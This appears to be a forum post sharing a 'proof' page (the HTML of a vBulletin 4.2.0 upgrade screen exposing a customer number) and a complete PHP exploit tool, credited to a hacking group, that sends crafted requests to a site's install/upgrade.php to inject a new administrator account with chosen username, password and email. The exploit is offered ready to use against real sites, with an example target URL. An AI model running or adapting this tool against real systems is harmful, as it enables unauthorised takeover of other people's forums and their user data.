proof:
Code:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT" /> <meta http-equiv="Pragma" content="no-cache, must-revalidate" /> <title>vBulletin 4.2.0 Upgrade System </title> <link rel="stylesheet" href="../cpstyles/vBulletin_3_Silver/controlpanel.css" /> <style type="text/css"> body { margin:0; } #vb_overlay_background { opacity:0.50; -moz-opacity:0.50; filter:alpha(opacity=50); background-color:#000000; z-index:10; position:fixed; top:0px; left:0px; width:100%; height:100%; } #header { border:outset 2px; display:block; padding:5px; } .floatcontainer:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; } .floatcontainer { display:inline-block; } /* IE-Mac hide \*/ * html .floatcontainer { height:1%; } .floatcontainer { display:block; } .floatcontainer.hidden { display:none; } /* End IE-Mac hide */ #header div.logo { width:160px; float:left; } #header div.notice { padding-left:220px; padding-top:18px; } #header div.xml1 { float:right; text-align:right; padding-top:5px; } #header div.xml2 { float:right; text-align:left; padding-top:5px; padding-right:10px; margin-left:15px; } #header div.xml1 ul, #header div.xml2 ul { list-style-type:none; margin:0; padding:0; font-size: 11px; font-family: tahoma, verdana, arial, helvetica, sans-serif; } #all { margin: 10px; } #all p, #all td, #all li, #all div { font-size: 11px; font-family: verdana, arial, helvetica, sans-serif; } #confirm, #prompt { z-index:11; position:absolute; } #prompt div.input { display:block; } #progressbox, #mismatch, #authenticate, #prompt, #confirm, #startup_errors { width:375px; text-align:center; margin-left:auto; margin-right:auto; margin-top:20px; } #startup_errors { overflow:hidden; max-height:400px; _height:400px; } #startup_errors .messagebody { text-align:left; padding:10px; overflow:auto; max-height:330px; _height:330px; } #startup_errors form { margin:0; padding:5px; } #startup_errors input[type="submit"] { margin:0; } #startup_errors li img { width:0; } #promptmessage, #confirmmessage { padding:10px; text-align:left; overflow:auto; max-height:400px; } #progresssection .buttons { text-align:left; } .messageheader { padding:5px; font-weight:bold; text-align:center; } .submit, .messagebody { padding:5px; } .advancedconfirmbody { padding-left:10px; padding-right:10px; } .advancedconfirm .messagebody{ padding:0; } .advancedconfirm #confirmmessage { padding:0; } .list_no_decoration { list-style-type:none; margin:0px; padding:0px; } #detailbox { margin: 20px auto; width:375px; } #promptresponse { width:90%; } #customerid { width:250px; font-weight:bold; display:block; margin:10px auto 0 auto; } #customerid_error { margin:10px 0; padding:3px; } input[type="submit"] { margin-top:10px; } #mainmessage { height:300px; overflow:auto; padding-bottom:10px; } #mainmessage > ul > li { margin-left:25px; text-indent:-25px; } #mainmessage > ul > li ol, #mainmessage > ul > li.noindent { margin-left:0; text-indent:0; } #mainmessage li.querystatus {} #upgradeprogress { margin-right:10px; margin-top:4px; float:right; vertical-align:middle; } #progressbar_container { border:1px outset; height:16px; width:95%; margin:10px auto; background-color:#FFFFFF; text-align:left; } #progressbar { width:0; height:15px; padding-top:1px; background-color:#CCCCCC; text-align:right; overflow:auto; float:left; } #progressbar span { margin-right: 2px; } #percentageout { margin-left: 2px; padding-top:1px; float:left; } #showdetails, #hidedetails { margin-left: 7px; } #beginsection { #padding-bottom:10px; } #confirmform, #promptform { padding:0; margin:0; } #optionsbox { text-align:left } .hidden { display:none; } .usererror { display:block; color:red; } .usererror.hidden { display:none; } .lbinstallselect { max-width:180px; _width:180px; } div.consolemsg { text-align:left; padding:10px; } div.consolemsg ul li { font-weight:bold; list-style-type:none; } } </style> <script type="text/javascript"> <!-- var IMGDIR_MISC = "../cpstyles/vBulletin_3_Silver"; var CLEARGIFURL = "./clear.gif"; var CUSTNUMBER = "a0ec1a9dca589d3b988311afaa570d29"; var VERSION = ""; var SCRIPTINFO = { version: "", startat: "", step : "", only : "" }; var ADMINDIR = "../bossflight"; var TOTALSTEPS = 0; var ABORTMSG = "Status: Aborted"; var UNEXPECTED_TEXT = "<strong>Unexpected Text:</strong><pre>%1$s</pre>"; var SETUPTYPE = "upgrade"; var STEP_X_Y = "Step %1$s - %2$s"; var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance"; //--> </script> <script type="text/javascript" src="../clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js"></script> <script type="text/javascript" src="../clientscript/yui/connection/connection-min.js"></script> <script type="text/javascript" src="../clientscript/vbulletin-core.js"></script> </head> <body> <div id="vb_overlay_background" class="hidden"></div> <div id="header" class="navbody floatcontainer"> <div class="xml2"> <ul> <li id="vb_style_version">4.2.0</li> <li id="vb_mobile_style_version">4.2.0</li> <li id="vb_settings_version">4.2.0</li> <li id="vb_language_version">4.2.0</li> <li id="vb_navigation_version">4.2.0</li> <li id="vb_admin_help_version">4.2.0</li> </ul> </div> <div class="xml1"> <ul> <li>vbulletin-style.xml:</li> <li>vbulletin-mobile-style.xml:</li> <li>vbulletin-settings.xml:</li> <li>vbulletin-language.xml:</li> <li>vbulletin-navigation.xml:</li> <li>vbulletin-adminhelp.xml:</li> </ul> </div> <div class="logo"> <img src="../cpstyles/vBulletin_3_Silver/cp_logo.gif" alt="" title="vBulletin 4 © 2013 vBulletin Solutions, Inc. All rights reserved." /> </div> <div class="notice"> <strong>vBulletin <span id="vb_version">4.2.0</span> Upgrade System</strong><br /> (Please be patient as some parts may take some time) </div> </div> <div id="all"> <div class="tborder hidden" id="startup_errors"> <div class="navbody messageheader">Startup Errors</div> <div class="messagebody logincontrols"> Due to the following errors, the install/upgrade can not continue: <ul> <li class="hidden"></li> </ul> </div> <form action="upgrade.php" method="post" id="submitconfirmform" class="status hidden"> <input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="submitconfirmok" value="Ignore and Continue" /> </form> </div> <div class="tborder" id="authenticate"> <div class="navbody messageheader">Please Enter Your Customer Number</div> <div class="messagebody logincontrols"> This is the number with which you log in to the vBulletin.com Members' Area <form action="upgrade.php" method="post"> <input type="text" tabindex="1" value="" name="customerid" id="customerid" /> <input class="button" type="submit" tabindex="1" accesskey="s" id="authsubmit" value="Enter Upgrade System" /> <input type="hidden" name="step" value="0" /> <input type="hidden" name="startat" value="0" /> <input type="hidden" name="only" value="0" /> </form> </div> </div> <div class="tborder hidden" id="mismatch"> <div class="navbody messageheader">Version Mismatch</div> <div class="messagebody logincontrols"> Your upgrade log shows that your last upgrade was to version but you are currently on version 4.2.0. <form action="upgrade.php" method="post"> <input type="hidden" name="mismatch" value="1" /> <label for="version1"><input id="version1" type="radio" name="version" value="" />Upgrade from </label> <label for="version2"><input id="version2" type="radio" name="version" value="4.2.0" />Upgrade from 4.2.0</label> <input class="button" type="submit" tabindex="1" accesskey="s" name="" value="Enter Upgrade System" /> <input type="hidden" name="step" value="0" /> <input type="hidden" name="startat" value="0" /> <input type="hidden" name="only" value="0" /> </form> </div> </div> <div class="tborder hidden" id="progressbox"> <div class="navbody messageheader"></div> <div class="messagebody logincontrols"> <div class="hidden" id="progresssection"> <div id="progressmessage"></div> <div id="progressbar_container"> <div id="progressbar"></div> <div id="percentageout"></div> </div> <div id="progressnotice"></div> <div class="buttons floatcontainer"> <img id="upgradeprogress" class="hidden" src="../cpstyles/vBulletin_3_Silver/progress.gif" alt="" /> <input class="button" type="button" id="showdetails" tabindex="1" name="" value="Show Details" /> <input class="button hidden" type="button" id="hidedetails" tabindex="1" name="" value="Hide Details" /> <input class="button hidden" type="button" id="admincp" tabindex="1" name="" value="Admin CP" /> <input class="button hidden" type="button" id="querystatus" tabindex="1" name="" value="Query Status" /> </div> </div> <div id="beginsection"> <form action="upgrade.php" id="optionsform" method="post"> <p></p> <input type="hidden" name="jsfail" value="1" /> <div class="hidden" id="optionsbox"> <table cellspacing="0" cellpadding="4" border="0" align="center" width="100%" id="cpform_table" class="" style="border-collapse: separate;"> <tbody> <tr> <td class="alt1"> Merge Template Updates </td> <td class="alt1"> Yes <input id="rb_merge1" type="radio" name="options[skiptemplatemerge]" value="0" checked="checked" /> No <input id="rb_merge2" type="radio" name="options[skiptemplatemerge]" value="1" /> </td> </tr> </tbody> </table> </div> <input class="button" type="submit" id="beginupgrade" tabindex="1" name="" value="" /> <input class="button" type="submit" id="options" tabindex ="2" name="" value="Options" /> </form> </div> </div> </div> <div id="detailbox" class="tborder hidden"> <div class="navbody messageheader"></div> <div id="mainmessage" class="messagebody logincontrols"></div> <div class="status"> <span id="statusmessage"></span> </div> </div> <div class="tborder hidden" id="prompt"> <div class="navbody messageheader" id="prompttitle">Action Required</div> <div class="messagebody logincontrols"> <div id="promptmessage"></div> <form action="upgrade.php" method="post" id="promptform"> <input type="text" tabindex="1" value="" name="promptresponse" id="promptresponse" /> <div class="submit"> <input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="promptsubmit" value="OK" /> <input class="button hidden" type="reset" name="reset" tabindex="1" id="promptreset" value="Reset" /> <input class="button hidden" type="submit" name="submit" tabindex="1" accesskey="s" id="promptcancel" value="Cancel" /> </div> </form> </div> </div> <div class="tborder hidden" id="confirm"> <div class="navbody messageheader" id="confirmtitle">Action Required</div> <div class="messagebody logincontrols"> <form action="upgrade.php" method="post" id="confirmform"> <div id="confirmmessage"></div> <div class="submit"> <input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="confirmok" value="OK" /> <input class="button hidden" type="reset" name="reset" tabindex="1" id="confirmreset" value="Reset" /> <input class="button" type="button" name="cancel" tabindex="1" accesskey="s" id="confirmcancel" value="Cancel" /> </div> </form> </div> </div> </div> <p align="center"><a href="http://www.vbulletin.com/" target="_blank" class="copyright"> vBulletin v4.2.0, Copyright © 2013 vBulletin Solutions, Inc. All rights reserved. </a></p> <script type="text/javascript" src="vbulletin-upgrade.js"></script> </body> </html>Code:<html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>vBulletin 0day</title> <style type="text/css"> <!-- body { background-color: #000; text-align: center; color: #063; font-size: large; } .a { font-size: 24px; } .f { color: #060; } .gbf { color: #F00; } .dd { color: #F00; } .w { font-size: large; } a:link { text-decoration: none; } a:visited { text-decoration: none; } a:hover { text-decoration: none; } a:active { text-decoration: none; } --> </style></head><body> <p class="a"> <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> <br>Created by: 1337 <br>Found on: 08/22/2013 <br>Website: http://www.madleets.com </p> <br> <?php //extract data from the post if(isset($_POST['submit'])){ extract($_POST); //set POST variables $url = $_POST['url']; $fields = array( 'ajax' => urlencode('1'), 'version' => urlencode('install'), 'checktable' => urlencode('false'), 'firstrun' => urlencode('false'), 'step' => urlencode('7'), 'startat' => urlencode('0'), 'only' => urlencode('false'), 'customerid' => urlencode($_POST['customerid']), 'options[skiptemplatemerge]' => urlencode('0'), 'response' => urlencode('yes'), 'htmlsubmit' => urlencode('1'), 'htmldata[username]' => urlencode($_POST['username']), 'htmldata[password]' => urlencode($_POST['password']), 'htmldata[confirmpassword]' => urlencode($_POST['password']), 'htmldata[email]' => urlencode($_POST['email']) ); //url-ify the data for the POST foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; } rtrim($fields_string, '&'); //open connection $ch = curl_init(); //set the url, number of POST vars, POST data curl_setopt($ch,CURLOPT_URL, $url); curl_setopt($ch,CURLOPT_POST, count($fields)); curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string); curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE); curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] ); //execute post $result = curl_exec($ch); //close connection curl_close($ch); exit(); } ?> <center> <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>"> <span>Example:http://rubycalaber.com/forum/install/upgrade.php</span><br> <span>Website:</span> <input name="url" type="text" tabindex="1" size="60" /> <br> <span>Customer ID:</span> <input name="customerid" type="text" tabindex="2" size="40" /> <br> <span>Username:</span> <input name="username" type="text" tabindex="3" size="40" /> <br> <span>Password:</span> <input name="password" type="text" tabindex="4" size="40" /> <br> <span>Email:</span> <input name="email" type="text" tabindex="5" maxlength="40" /> <input name="submit" type="submit" value="Inject Admin"> </form> </center> <p class="a">------------------------------------------------------------------------------------------------------------------</p> <p class="a">MaDLeeTs TeaM </p> <p class="a">------------------------------------------------------------------------------------------------------------------</p> </div> </pre> <p class="a"> </p> <p align="center"> </body></html>![]()
Results 61 to 90 of 218
Threaded View
-
09-16-2013
Last edited by m0nde; 09-16-2013 at 01:05 PM.
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)